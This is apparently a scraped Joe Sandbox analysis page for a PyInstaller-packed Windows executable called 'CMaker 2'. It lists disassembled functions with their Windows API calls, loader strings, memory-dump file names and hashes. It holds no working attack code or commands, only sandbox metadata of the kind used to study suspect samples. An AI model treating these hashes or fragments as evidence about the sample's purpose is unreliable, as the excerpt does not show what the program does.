                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 1a3e8b8eb2fdd931f1516922c3244619dcb6b035101358effb1656bca6f43a26
                                                                                                                                                                                  • Instruction ID: 8895bfbc36d6bfff1f00e222b1f59417426e8123ce408b7cb8e9329e686c3927
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a3e8b8eb2fdd931f1516922c3244619dcb6b035101358effb1656bca6f43a26
                                                                                                                                                                                  • Instruction Fuzzy Hash: E4F06875B182998EDBA48F2DA40262A77E4F708380F809079E59DC3B44EA7C90608F04
                                                                                                                                                                                  Function 00007FF6FABE60C0 Relevance: 112.3, APIs: 31, Strings: 33, Instructions: 264libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                  • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                  • API String ID: 190572456-573889970
                                                                                                                                                                                  • Opcode ID: e7ad631868096c1857f19de989c3ae72b1e7ed32f0438870ee7e79edbb589c26
                                                                                                                                                                                  • Instruction ID: 857f873d96ab79f8aab4f997b8a7b5ae86da6f12a4b5bc5144c537041845d8c6
                                                                                                                                                                                  • Opcode Fuzzy Hash: e7ad631868096c1857f19de989c3ae72b1e7ed32f0438870ee7e79edbb589c26
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9AE16EE4A0DB4790FB56CB14B8A02B463B4BF19754B94A0F6C93ED23E5FF3CA5499201
                                                                                                                                                                                  Function 00007FF6FABE69A0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 115COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE7800: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6FABE31D4,00000000,00007FF6FABE1905), ref: 00007FF6FABE7839
                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF6FABE6EC7,?,00000000,FFFFFFFF,00007FF6FABE2AA6), ref: 00007FF6FABE69FC
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ByteCharEnvironmentExpandMultiStringsWide
                                                                                                                                                                                  • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                  • API String ID: 2001182103-930877121
                                                                                                                                                                                  • Opcode ID: 64d99159d200a5e4cd4d4a8101930630fc8e86c1a9a6e01072d2e1df627dda6d
                                                                                                                                                                                  • Instruction ID: 8b25c6b12ee2d5cc3aba61eaff1e1de9e96f50184a8bad144f05e36eec7f1066
                                                                                                                                                                                  • Opcode Fuzzy Hash: 64d99159d200a5e4cd4d4a8101930630fc8e86c1a9a6e01072d2e1df627dda6d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4641BA61B1C68341FB51DB25E8A12BA6361EF95780FC4A4F5E66EC36D6FE3CE5048700
                                                                                                                                                                                  Function 00007FF6FABF60B0 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID: -$:$f$p$p
                                                                                                                                                                                  • API String ID: 3215553584-2013873522
                                                                                                                                                                                  • Opcode ID: 4cf7e6b867a9921ad7ec7aa07c9b27dd84d4bc01ad74cf8c657fddc9a570da3b
                                                                                                                                                                                  • Instruction ID: 58299c967cc52368a5bca97e44246e660f45fb03daf624c6653088e5be0ea759
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4cf7e6b867a9921ad7ec7aa07c9b27dd84d4bc01ad74cf8c657fddc9a570da3b
                                                                                                                                                                                  • Instruction Fuzzy Hash: FC12C469E0C2C346FB205B94E1242B9B699FB52750FCC417DDEA9866C4FF3DE9809B10
                                                                                                                                                                                  Function 00007FF6FABEF440 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID: f$f$p$p$f
                                                                                                                                                                                  • API String ID: 3215553584-1325933183
                                                                                                                                                                                  • Opcode ID: 2761c62bb11862c53203c4a1c44b9eb9fed40e0afa0247b40f2c3f0b102f2d4b
                                                                                                                                                                                  • Instruction ID: 5cd1ede6f597023a0ed36f1a76f0d20770555450b2b4e465ef96749780edff71
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2761c62bb11862c53203c4a1c44b9eb9fed40e0afa0247b40f2c3f0b102f2d4b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 62129632F0D18386FB245A34E0946B976A2FB42755FD841F5D6A9866C4FF3DE890CB20
                                                                                                                                                                                  Function 00007FF6FABE1030 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 111COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                  • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                  • API String ID: 2050909247-3659356012
                                                                                                                                                                                  • Opcode ID: 02fa574a2b1b787a352bc7f7ecae9421bbc1ba1fff6180aac722f31c691a4446
                                                                                                                                                                                  • Instruction ID: 97f6ae28e7adeab17516ac88c1200cb8353f964b36fc9da8c4194eafbeccf629
                                                                                                                                                                                  • Opcode Fuzzy Hash: 02fa574a2b1b787a352bc7f7ecae9421bbc1ba1fff6180aac722f31c691a4446
                                                                                                                                                                                  • Instruction Fuzzy Hash: 72419361B0864242EB24DB16B8806BAA7A1FF56BC4FD490B1DD6EC77D6FE3CE0459301
                                                                                                                                                                                  Function 00007FF6FABE1420 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 100COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                  • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                  • API String ID: 2050909247-3659356012
                                                                                                                                                                                  • Opcode ID: ec37be12e2654c44ef8bbb66bf94e32f31c054afd3e906b5c1220b189cb7876c
                                                                                                                                                                                  • Instruction ID: 279696541d8bade015a870367066ae10042586f14fb06624f26be22086e27fbe
                                                                                                                                                                                  • Opcode Fuzzy Hash: ec37be12e2654c44ef8bbb66bf94e32f31c054afd3e906b5c1220b189cb7876c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 07418F61B0864282EB24DB15F4805BA63A0EF567D0FE490B2DE6EC7AD5FE7CE5418700
                                                                                                                                                                                  Function 00007FF6FABECE38 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                                                                  • Opcode ID: c5270a4f35af077b5cb6a45d2d3941eb25c66998b702b56485634ee7620a4e43
                                                                                                                                                                                  • Instruction ID: e8b523ac4dc007905ad3982da40c624cfcfc8085b0101e87d1acf2e76bca7ef5
                                                                                                                                                                                  • Opcode Fuzzy Hash: c5270a4f35af077b5cb6a45d2d3941eb25c66998b702b56485634ee7620a4e43
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6AD1A332A187428AEB60DF65D4843AD77A0FB46788F9001B5EE5D977DAEF78E081C740
                                                                                                                                                                                  Function 00007FF6FABEC0F8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF6FABEC3AA,?,?,?,00007FF6FABEC09C,?,?,?,00007FF6FABEBC99), ref: 00007FF6FABEC17D
                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF6FABEC3AA,?,?,?,00007FF6FABEC09C,?,?,?,00007FF6FABEBC99), ref: 00007FF6FABEC18B
                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF6FABEC3AA,?,?,?,00007FF6FABEC09C,?,?,?,00007FF6FABEBC99), ref: 00007FF6FABEC1B5
                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF6FABEC3AA,?,?,?,00007FF6FABEC09C,?,?,?,00007FF6FABEBC99), ref: 00007FF6FABEC223
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF6FABEC3AA,?,?,?,00007FF6FABEC09C,?,?,?,00007FF6FABEBC99), ref: 00007FF6FABEC22F
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                  • API String ID: 2559590344-2084034818
                                                                                                                                                                                  • Opcode ID: e5c3313d4d9644a9ae338b272818f224d8465b9764fd00572b6e393a8b0d30f2
                                                                                                                                                                                  • Instruction ID: 538b4d270b647e6ecd5f18ba376c5c2695be891ff24fab5e14c221a676154de0
                                                                                                                                                                                  • Opcode Fuzzy Hash: e5c3313d4d9644a9ae338b272818f224d8465b9764fd00572b6e393a8b0d30f2
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0431C361B0AA0285EF15DB42A8446756394BF0BBA4F9A45B5DD3EC73C1FF3CE9448341
                                                                                                                                                                                  Function 00007FF6FABFACD0 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                                                                  • Opcode ID: 9063112a897ac63af8ba62faf2419d83a9723f91e1d0204053fd492b5da33e5a
                                                                                                                                                                                  • Instruction ID: 901a0e3403c2e3a2ec85c7015842460940c5dfd772f390522d697e747fe581b6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9063112a897ac63af8ba62faf2419d83a9723f91e1d0204053fd492b5da33e5a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1121A12CB2E68241FB5CA7B1565113952524F967B0F9C47BCE93EC76D6FE2CB4108200
                                                                                                                                                                                  Function 00007FF6FAC07DCC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                  • String ID: CONOUT$
                                                                                                                                                                                  • API String ID: 3230265001-3130406586
                                                                                                                                                                                  • Opcode ID: cde044b729814a6b4b389e6e013c9bdbf801f90403088e59f1e1d6a2ccecc8e7
                                                                                                                                                                                  • Instruction ID: ac7526796cc28ec7220d2e8a25e4bca853cbd9ca9e020d392f39f8e1510f68a9
                                                                                                                                                                                  • Opcode Fuzzy Hash: cde044b729814a6b4b389e6e013c9bdbf801f90403088e59f1e1d6a2ccecc8e7
                                                                                                                                                                                  • Instruction Fuzzy Hash: 52118B61B18A4586E7508B02E854339B2B0FB98BE4F008274EA7EC77E4EF7CD905C740
                                                                                                                                                                                  Function 00007FF6FABFAE48 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF6FABFB111,?,?,?,?,00007FF6FABFA012,?,?,?,?,00007FF6FABF6F2B), ref: 00007FF6FABFAE57
                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6FABFB111,?,?,?,?,00007FF6FABFA012,?,?,?,?,00007FF6FABF6F2B), ref: 00007FF6FABFAE8D
                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6FABFB111,?,?,?,?,00007FF6FABFA012,?,?,?,?,00007FF6FABF6F2B), ref: 00007FF6FABFAEBA
                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6FABFB111,?,?,?,?,00007FF6FABFA012,?,?,?,?,00007FF6FABF6F2B), ref: 00007FF6FABFAECB
                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6FABFB111,?,?,?,?,00007FF6FABFA012,?,?,?,?,00007FF6FABF6F2B), ref: 00007FF6FABFAEDC
                                                                                                                                                                                  • SetLastError.KERNEL32(?,?,?,00007FF6FABFB111,?,?,?,?,00007FF6FABFA012,?,?,?,?,00007FF6FABF6F2B), ref: 00007FF6FABFAEF7
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                                                                  • Opcode ID: ed24a123b6018f0c1ad5b4e4d40ee256577037ee5ecebad31f99fe0e5e584a4b
                                                                                                                                                                                  • Instruction ID: beb11b4b1b7a27f66c52ed043af6a477a8f72c20a326c3831d9f259a2054f206
                                                                                                                                                                                  • Opcode Fuzzy Hash: ed24a123b6018f0c1ad5b4e4d40ee256577037ee5ecebad31f99fe0e5e584a4b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C117538B1C28245FB5897B1565103962515F9A7B0FAC47BCE93EC77DAFE2DB4418300
                                                                                                                                                                                  Function 00007FF6FABF9640 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
